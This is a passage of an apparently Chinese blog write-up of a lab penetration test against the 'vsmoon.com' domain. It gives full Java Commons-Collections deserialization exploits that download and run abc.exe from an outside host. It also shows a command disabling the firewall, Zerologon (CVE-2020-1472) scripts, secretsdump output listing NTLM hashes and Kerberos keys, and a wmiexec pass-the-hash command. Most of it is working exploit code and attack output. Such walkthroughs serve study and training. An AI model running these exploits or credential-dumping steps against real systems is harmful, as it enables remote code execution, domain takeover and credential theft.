761w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-150-300x112.png 300w\" sizes=\"auto, (max-width: 761px) 100vw, 761px\" \/><\/figure>\n\n\n\n<p>\u6211\u7528GPT\u5199\u4e86\u4e2a\u6d4b\u8bd5\u7684\u4ee3\u7801\uff0c\u5148\u5c1d\u8bd5\u9a8c\u8bc1\u4e00\u4e0b\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>&lt;dependencies&gt;\n        &lt;dependency&gt;\n            &lt;groupId&gt;commons-collections&lt;\/groupId&gt;\n            &lt;artifactId&gt;commons-collections&lt;\/artifactId&gt;\n            &lt;version&gt;3.2.1&lt;\/version&gt;\n        &lt;\/dependency&gt;\n&lt;\/dependencies&gt;<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.map.TransformedMap;\n\nimport java.io.*;\nimport java.lang.reflect.Constructor;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class LocalExploitTest {\n    public static void main(String&#91;] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            Transformer&#91;] transformers = new Transformer&#91;]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class&#91;]{String.class, Class&#91;].class},\n                            new Object&#91;]{\"getRuntime\", new Class&#91;0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class&#91;]{Object.class, Object&#91;].class},\n                            new Object&#91;]{null, new Object&#91;0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class&#91;]{String.class},\n                            new Object&#91;]{\"calc.exe\"})  \/\/ Windows\u73af\u5883\u4e0b\u6267\u884c\u8ba1\u7b97\u5668\u7a0b\u5e8f\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u4f7f\u7528Map\u8fdb\u884c\u5305\u88c5\uff0c\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u65f6\u7684\u547d\u4ee4\u6267\u884c\n            Map innerMap = new HashMap();\n            innerMap.put(\"value\", \"test\");\n            Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);\n\n            \/\/ \u4f7f\u7528\u53cd\u5c04\u521b\u5efaAnnotationInvocationHandler\uff0c\u6765\u5229\u7528\u4ee3\u7406\u6267\u884c\n            Class cls = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\");\n            Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);\n            ctor.setAccessible(true);\n            Object instance = ctor.newInstance(java.lang.Override.class, outerMap);\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u5e8f\u5217\u5316\u8be5\u6076\u610f\u5bf9\u8c61\u5230\u6587\u4ef6\n            FileOutputStream fileOut = new FileOutputStream(\"exploit_payload.bin\");\n            ObjectOutputStream out = new ObjectOutputStream(fileOut);\n            out.writeObject(instance);\n            out.close();\n            fileOut.close();\n\n            System.out.println(\"\u6076\u610f\u5bf9\u8c61\u5df2\u5e8f\u5217\u5316\u5230 exploit_payload.bin \u6587\u4ef6\");\n\n            \/\/ \u7b2c\u4e94\u6b65\uff1a\u53cd\u5e8f\u5217\u5316\u6076\u610f\u5bf9\u8c61\u5e76\u6267\u884c\u547d\u4ee4\n            FileInputStream fileIn = new FileInputStream(\"exploit_payload.bin\");\n            ObjectInputStream in = new ObjectInputStream(fileIn);\n            in.readObject();  \/\/ \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u547d\u4ee4\u5c06\u88ab\u6267\u884c\n            in.close();\n            fileIn.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u8fd0\u884c\u7684\u65f6\u5019\u6ca1\u6709\u89e6\u53d1<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"792\" height=\"215\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-151.png\" alt=\"\" class=\"wp-image-678\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-151.png 792w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-151-300x81.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-151-768x208.png 768w\" sizes=\"auto, (max-width: 792px) 100vw, 792px\" \/><\/figure>\n\n\n\n<p>\u770b\u6765\u662f\u7248\u672c\u95ee\u9898\uff0c\u9700\u8981\u6539\u4e00\u4e0b\uff08\u5b58\u7591\uff09<\/p>\n\n\n\n<p>\u8fd8\u662f\u6ca1\u6cd5\u89e6\u53d1\uff0c\u6211\u62ff\u6697\u6708\u63d0\u4f9b\u7684\u4ee3\u7801\u8fdb\u884c\u4e86\u6bd4\u8f83\uff0c\u6211\u7528\u7684\u662f<strong>TransformedMap<\/strong>\uff0c\u6697\u6708\u7528\u7684\u662f<code><strong>LazyMap<\/strong><\/code>\u548c<code><strong>TiedMapEntry<\/strong><\/code>\u7684\u7ed3\u5408\u3002<strong>\u8fd9\u4e00\u6bb5\u8bdd\u5199\u7ed9\u672a\u6765\u4ee3\u7801\u5ba1\u8ba1\u7684\u6211\u3002<\/strong><\/p>\n\n\n\n<p><strong>TransformedMap\u662f\u5c06\u67d0\u4e9b\u64cd\u4f5c\uff08\u5982 <code>get()<\/code>\u3001<code>put()<\/code>\uff09\u8f6c\u6362\u4e3a\u547d\u4ee4\u6267\u884c\uff0c\u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u4e0d\u4f1a\u6267\u884c\u547d\u4ee4\uff0c\u53ea\u6709\u5728\u5bf9 <code>TransformedMap<\/code> \u8fdb\u884c\u64cd\u4f5c\u65f6\uff08\u4f8b\u5982\u8c03\u7528 <code>get()<\/code> \u65b9\u6cd5\uff09\u624d\u4f1a\u89e6\u53d1\u547d\u4ee4\u6267\u884c\uff0c\u4e5f\u5c31\u662f\u624b\u52a8\u89e6\u53d1\u624d\u80fd\u6267\u884c\u547d\u4ee4\u3002<\/strong><\/p>\n\n\n\n<p><strong><code>LazyMap<\/code>\u548c<code>TiedMapEntry<\/code>\u7684\u7ed3\u5408\uff0c\u8fd9\u79cd\u7ed3\u6784\u5728 <code>HashMap<\/code> \u5185\u90e8\u4f1a\u8c03\u7528 <code>TiedMapEntry<\/code> \u7684 <code>hashCode()<\/code> \u6216 <code>equals()<\/code> \u65b9\u6cd5\uff0c\u8fd9\u4e9b\u65b9\u6cd5\u5728\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u4e2d\u4f1a\u81ea\u52a8\u88ab\u8c03\u7528\uff0c\u65e0\u9700\u624b\u52a8\u8c03\u7528 <code>get()<\/code> \u6216\u5176\u4ed6\u65b9\u6cd5\uff0c\u4f1a\u81ea\u52a8\u6267\u884c\u547d\u4ee4\u3002<\/strong><\/p>\n\n\n\n<p><strong>\u539f\u7406\uff1aJava \u7684 <code>HashMap<\/code> \u5728\u5b58\u50a8\u548c\u6bd4\u8f83\u952e\u503c\u5bf9\u65f6\u4f1a\u8c03\u7528 <code>hashCode()<\/code>\uff0c\u800c <code>TiedMapEntry<\/code> \u4f1a\u5c06\u8be5\u8c03\u7528\u4f20\u9012\u7ed9 <code>LazyMap<\/code>\uff0c\u4ece\u800c\u89e6\u53d1 <code>LazyMap<\/code> \u7684 <code>factory<\/code>\uff0c\u8fdb\u800c\u6267\u884c Transformer \u94fe\u3002<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>package nightying.com;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.*;\nimport java.lang.reflect.Field;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Main {\n    public static void main(String&#91;] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            Transformer&#91;] transformers = new Transformer&#91;]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class&#91;]{String.class, Class&#91;].class},\n                            new Object&#91;]{\"getRuntime\", new Class&#91;0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class&#91;]{Object.class, Object&#91;].class},\n                            new Object&#91;]{null, new Object&#91;0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class&#91;]{String.class},\n                            new Object&#91;]{\"calc.exe\"})  \/\/ Windows\u73af\u5883\u4e0b\u6267\u884c\u8ba1\u7b97\u5668\u7a0b\u5e8f\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u4f7f\u7528LazyMap\u8fdb\u884c\u5305\u88c5\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap&lt;&gt;();\n            hashMap.put(tiedMapEntry, \"value\");\n            lazyMap.remove(\"key\");\n\n            \/\/ \u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ \u76f4\u63a5\u5728\u5185\u5b58\u4e2d\u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\n            ByteArrayOutputStream byteOut = new ByteArrayOutputStream();\n            ObjectOutputStream objectOut = new ObjectOutputStream(byteOut);\n            objectOut.writeObject(hashMap);\n            objectOut.close();\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u53cd\u5e8f\u5217\u5316\u5bf9\u8c61\u5e76\u81ea\u52a8\u89e6\u53d1\u6267\u884c\n            ByteArrayInputStream byteIn = new ByteArrayInputStream(byteOut.toByteArray());\n            ObjectInputStream objectIn = new ObjectInputStream(byteIn);\n            objectIn.readObject();  \/\/ \u5728\u53cd\u5e8f\u5217\u5316\u65f6\uff0c\u547d\u4ee4\u5c06\u88ab\u6267\u884c\n            objectIn.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}\n<\/code><\/pre>\n\n\n\n<p>\u6211\u7528GPT\u5199\u4e86\u4e00\u4e2a\u4e0b\u8f7d\u7684\u4ee3\u7801\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.ObjectOutputStream;\nimport java.io.OutputStream;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\nimport java.net.Socket;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Exploit {\n    public static void main(String&#91;] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u521b\u5efa\u547d\u4ee4\u6267\u884c\u7684Transformer\u94fe\n            String url = \"http:\/\/192.168.24.152:12312\/abc.exe\"; \/\/ \u66ff\u6362\u4e3a\u4f60\u9700\u8981\u4e0b\u8f7d\u7684URL\n            String savePath = \"C:\\\\Users\\\\Public\\\\Downloads\\\\abc.exe\"; \/\/ \u4fdd\u5b58\u8def\u5f84\n\n            \/\/ \u4f7f\u7528PowerShell\u4e0b\u8f7d\u6587\u4ef6\u7684\u547d\u4ee4\n            String command = \"powershell.exe -Command \\\"Invoke-WebRequest '\" + url + \"' -OutFile '\" + savePath + \"'\\\"\";\n\n            Transformer&#91;] transformers = new Transformer&#91;]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class&#91;]{String.class, Class&#91;].class},\n                            new Object&#91;]{\"getRuntime\", new Class&#91;0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class&#91;]{Object.class, Object&#91;].class},\n                            new Object&#91;]{null, new Object&#91;0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class&#91;]{String.class},\n                            new Object&#91;]{command})  \/\/ \u6267\u884c\u4e0b\u8f7d\u547d\u4ee4\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5\u8fd9\u4e9bTransformer\n            Transformer transformerChain = new ChainedTransformer(transformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u6784\u5efaLazyMap\u548cTiedMapEntry\u7ed3\u6784\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap();\n            hashMap.put(tiedMapEntry, \"value\");\n\n            \/\/ \u79fb\u9664lazyMap\u4e2d\u7684\u539f\u59cb\u952e\u503c\n            lazyMap.remove(\"key\");\n\n            \/\/ \u901a\u8fc7\u53cd\u5c04\u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u901a\u8fc7Socket\u8fde\u63a5\u5230\u76ee\u6807\u670d\u52a1\u5668\uff0c\u53d1\u9001\u6076\u610fpayload\n            Socket socket = new Socket(\"192.168.24.146\", 9999);  \/\/ \u8bf7\u66ff\u6362\u4e3a\u5b9e\u9645\u76ee\u6807IP\u548c\u7aef\u53e3\n            OutputStream outputStream = socket.getOutputStream();\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream);\n            objectOutputStream.writeObject(hashMap);  \/\/ \u53d1\u9001\u5305\u542b\u6076\u610fpayload\u7684HashMap\n\n            objectOutputStream.close();\n            outputStream.close();\n            socket.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u6267\u884cabc.exe<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.ObjectOutputStream;\nimport java.io.OutputStream;\nimport java.lang.reflect.Field;\nimport java.net.Socket;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class Exploit {\n    public static void main(String&#91;] args) {\n        try {\n            \/\/ \u7b2c\u4e00\u6b65\uff1a\u6784\u5efaTransformer\u94fe\uff0c\u7528\u4e8e\u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            String execCommand = \"C:\\\\Users\\\\Public\\\\Downloads\\\\abc.exe\"; \/\/ \u66ff\u6362\u4e3a\u5df2\u4e0b\u8f7d\u7684\u6587\u4ef6\u8def\u5f84\n\n            \/\/ Transformer\u94fe\uff1a\u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            Transformer&#91;] execTransformers = new Transformer&#91;]{\n                    new ConstantTransformer(Runtime.class),\n                    new InvokerTransformer(\"getMethod\",\n                            new Class&#91;]{String.class, Class&#91;].class},\n                            new Object&#91;]{\"getRuntime\", new Class&#91;0]}),\n                    new InvokerTransformer(\"invoke\",\n                            new Class&#91;]{Object.class, Object&#91;].class},\n                            new Object&#91;]{null, new Object&#91;0]}),\n                    new InvokerTransformer(\"exec\",\n                            new Class&#91;]{String.class},\n                            new Object&#91;]{execCommand})  \/\/ \u6267\u884c\u4e0b\u8f7d\u7684\u6587\u4ef6\n            };\n\n            \/\/ \u7b2c\u4e8c\u6b65\uff1a\u4f7f\u7528ChainedTransformer\u6765\u94fe\u63a5Transformer\u94fe\n            Transformer transformerChain = new ChainedTransformer(execTransformers);\n\n            \/\/ \u7b2c\u4e09\u6b65\uff1a\u6784\u5efaLazyMap\u548cTiedMapEntry\u7ed3\u6784\n            Map lazyMap = LazyMap.decorate(new HashMap(), new ConstantTransformer(1));\n            TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"key\");\n            HashMap hashMap = new HashMap();\n            hashMap.put(tiedMapEntry, \"value\");\n\n            \/\/ \u79fb\u9664lazyMap\u4e2d\u7684\u539f\u59cb\u952e\u503c\n            lazyMap.remove(\"key\");\n\n            \/\/ \u901a\u8fc7\u53cd\u5c04\u4fee\u6539LazyMap\u7684factory\u5b57\u6bb5\uff0c\u66ff\u6362\u4e3aTransformer\u94fe\n            Field factoryField = LazyMap.class.getDeclaredField(\"factory\");\n            factoryField.setAccessible(true);\n            factoryField.set(lazyMap, transformerChain);\n\n            \/\/ \u7b2c\u56db\u6b65\uff1a\u901a\u8fc7Socket\u8fde\u63a5\u5230\u76ee\u6807\u670d\u52a1\u5668\uff0c\u53d1\u9001\u6076\u610fpayload\n            Socket socket = new Socket(\"192.168.24.146\", 9999);  \/\/ \u8bf7\u66ff\u6362\u4e3a\u5b9e\u9645\u76ee\u6807IP\u548c\u7aef\u53e3\n            OutputStream outputStream = socket.getOutputStream();\n            ObjectOutputStream objectOutputStream = new ObjectOutputStream(outputStream);\n            objectOutputStream.writeObject(hashMap);  \/\/ \u53d1\u9001\u5305\u542b\u6076\u610fpayload\u7684HashMap\n\n            objectOutputStream.close();\n            outputStream.close();\n            socket.close();\n\n        } catch (Exception e) {\n            e.printStackTrace();\n        }\n    }\n}<\/code><\/pre>\n\n\n\n<p>\u5148\u751f\u6210\u4e2a\u9a6c\u5b50\uff0c\u7136\u540e\u5c1d\u8bd5\u5229\u7528\uff0c\u628a\u4e24\u4e2a\u6253\u5305\u6210jar\uff0c\u7136\u540e\u5728web\u673a\u4e0a\u4f20\u4e0a\u53bbgohttp\uff0c\u548cabc.exe\uff0c\u6302\u4e0a\u4ee3\u7406\uff0c\u6309\u7167\u987a\u5e8f\u6267\u884cjar<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"799\" height=\"178\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-153.png\" alt=\"\" class=\"wp-image-691\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-153.png 799w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-153-300x67.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-153-768x171.png 768w\" sizes=\"auto, (max-width: 799px) 100vw, 799px\" \/><\/figure>\n\n\n\n<p>\u4e0a\u7ebf\u6210\u529f\uff0c\u6743\u9650\u8fd8\u662fsystem<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"312\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-154-1024x312.png\" alt=\"\" class=\"wp-image-692\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-154-1024x312.png 1024w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-154-300x91.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-154-768x234.png 768w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-154.png 1243w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u57df\u63a7<\/h2>\n\n\n\n<p>\u5148\u770b\u770b\u6709\u6ca1\u6709\u9632\u706b\u5899\u5565\u7684<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>netsh advfirewall show allprofiles\nnetsh advfirewall set allprofiles state off<\/code><\/pre>\n\n\n\n<p>\u9632\u706b\u5899\u90fd\u662f\u5173\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"737\" height=\"429\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-155.png\" alt=\"\" class=\"wp-image-697\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-155.png 737w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-155-300x175.png 300w\" sizes=\"auto, (max-width: 737px) 100vw, 737px\" \/><\/figure>\n\n\n\n<p>\u7136\u540e\u8fdb\u884c\u4e00\u6ce2\u57df\u4fe1\u606f\u6536\u96c6\uff0c\u6402\u4e2ahash\u770b\u770b\uff0c\u57df\u53ebvsmoon.com<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Username\uff1a\nDATA$\nNTLM\uff1a\n3649b51842b196c4980aa9b94ea1d421<\/code><\/pre>\n\n\n\n<p>DNS\u670d\u52a1\u5668\u662f10.10.10.137<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"687\" height=\"695\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-156.png\" alt=\"\" class=\"wp-image-700\" style=\"width:620px;height:auto\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-156.png 687w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-156-297x300.png 297w\" sizes=\"auto, (max-width: 687px) 100vw, 687px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"671\" height=\"316\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-157.png\" alt=\"\" class=\"wp-image-701\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-157.png 671w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-157-300x141.png 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>\u4e0a\u4e2aFscan\u5f00\u626b\uff0c\u5f00\u4e8688,445,139,135\uff0c\u57df\u63a7AD<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"603\" height=\"428\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-159.png\" alt=\"\" class=\"wp-image-706\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-159.png 603w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-159-300x213.png 300w\" sizes=\"auto, (max-width: 603px) 100vw, 603px\" \/><\/figure>\n\n\n\n<p>\u603b\u611f\u89c9\uff0c\u80fd\u6545\u6280\u91cd\u65bd\u4e00\u4e0b\uff0c\u6211\u76f4\u63a5\u4e0aCVE-2020-1472\u5148\u63a2\u4e00\u624b\uff0c\u6302\u4e0a\u4ee3\u7406\uff0c\u5f00\u6d4b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python zerologon_tester.py AD 10.10.10.137<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"879\" height=\"237\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-160.png\" alt=\"\" class=\"wp-image-710\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-160.png 879w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-160-300x81.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-160-768x207.png 768w\" sizes=\"auto, (max-width: 879px) 100vw, 879px\" \/><\/figure>\n\n\n\n<p>\u597d\u597d\u597d\uff0c\u8fd8\u771f\u6709\uff0c\u8001\u6837\u5b50<\/p>\n\n\n\n<p>\u7f6e\u7a7a\uff0c\u6293hash\uff0c\u6765\u4e00\u5957<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python set_empty_pw.py AD 10.10.10.137<\/code><\/pre>\n\n\n\n<p>\u6211\u8fd8\u4ee5\u4e3a\u8dd1\u4e0d\u51fa\u6765\u4e86\uff0c\u8dd1\u4e86\u597d\u4e45<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"981\" height=\"433\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-161.png\" alt=\"\" class=\"wp-image-714\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-161.png 981w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-161-300x132.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-161-768x339.png 768w\" sizes=\"auto, (max-width: 981px) 100vw, 981px\" \/><\/figure>\n\n\n\n<p>\u6293hash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>secretsdump.exe vsmoon\/AD$@10.10.10.137 -no-pass<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"923\" height=\"459\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-162.png\" alt=\"\" class=\"wp-image-716\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-162.png 923w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-162-300x149.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-162-768x382.png 768w\" sizes=\"auto, (max-width: 923px) 100vw, 923px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>&#91;-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\n&#91;*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)\n&#91;*] Using the DRSUAPI method to get NTDS.DIT secrets\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nkrbtgt:502:aad3b435b51404eeaad3b435b51404ee:9307d2f925e8c9025ff452c0f6681313:::\nvsmoon.com\\data:1104:aad3b435b51404eeaad3b435b51404ee:3e9b45207bedfe4877c5567673e19d01:::\nAD$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nDATA$:1105:aad3b435b51404eeaad3b435b51404ee:3649b51842b196c4980aa9b94ea1d421:::\n&#91;*] Kerberos keys grabbed\nkrbtgt:aes256-cts-hmac-sha1-96:134e1843ce6aa68b586b93f6b33b67adf26ae3dc9cab78be617eaf538bbbfcd0\nkrbtgt:aes128-cts-hmac-sha1-96:b1284e87a3414a984d5295801f10ddc1\nkrbtgt:des-cbc-md5:133723fdc7970d4a\nvsmoon.com\\data:aes256-cts-hmac-sha1-96:8dbb79f54eb6160e00f424386eed8650b19a76f7a870732cd21df63cd5139e99\nvsmoon.com\\data:aes128-cts-hmac-sha1-96:eb597a5e13b47685916dc3406e8028ce\nvsmoon.com\\data:des-cbc-md5:6e2f6e6da2e96bf4\nAD$:aes256-cts-hmac-sha1-96:a7c23d712488d3c211bf50cc4cff225bc0781a86ba5d46d43fd18bedca68f2d6\nAD$:aes128-cts-hmac-sha1-96:1d3cbd31aba22311b1f5fb61eeca2e0e\nAD$:des-cbc-md5:26d9235845d07643\nDATA$:aes256-cts-hmac-sha1-96:7d71a5d6aa75fed095ecd2b9e5ad417e95b7649cb2af9a6d9b1133ec0b87fcca\nDATA$:aes128-cts-hmac-sha1-96:b78e676f3c83f5c72673b78628f8eed2\nDATA$:des-cbc-md5:5bf72c15f8389491<\/code><\/pre>\n\n\n\n<p>wmiexec\u8fde\u4e0a\u53bb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python wmiexec-pro.py -hashes aad3b435b51404eeaad3b435b51404ee:66120f7b66195b694faeabc4e3b6752d vsmoon\/Administrator@10.10.10.137 exec-command -command \"whoami\"<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"818\" height=\"465\" src=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-163.png\" alt=\"\" class=\"wp-image-718\" srcset=\"https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-163.png 818w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-163-300x171.png 300w, https:\/\/www.nightying.com\/wp-content\/uploads\/2024\/09\/image-163-768x437.png 768w\" sizes=\"auto, (max-width: 818px) 100vw, 818px\" 